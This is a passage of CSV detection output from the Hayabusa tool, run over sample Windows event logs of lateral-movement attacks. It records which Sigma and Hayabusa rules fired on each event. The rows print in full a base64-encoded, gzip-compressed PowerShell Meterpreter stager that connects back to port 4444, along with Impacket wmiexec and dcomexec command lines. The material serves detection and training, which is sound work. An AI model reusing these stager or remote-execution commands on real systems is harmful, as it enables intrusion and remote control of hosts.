IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.371 +00:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.371 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:53.152 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:54.152 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:32:50.902 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.168 +00:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.168 +00:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.168 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.246 +00:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.246 +00:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.246 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.324 +00:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.324 +00:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.324 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.324 +00:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.371 +00:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.371 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.371 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:52.402 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:52.402 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:35:11.856 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:11.856 +00:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:12.449 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:12.449 +00:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:12.449 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.168 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.168 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.418 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.418 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.449 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.449 +00:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.449 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.512 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 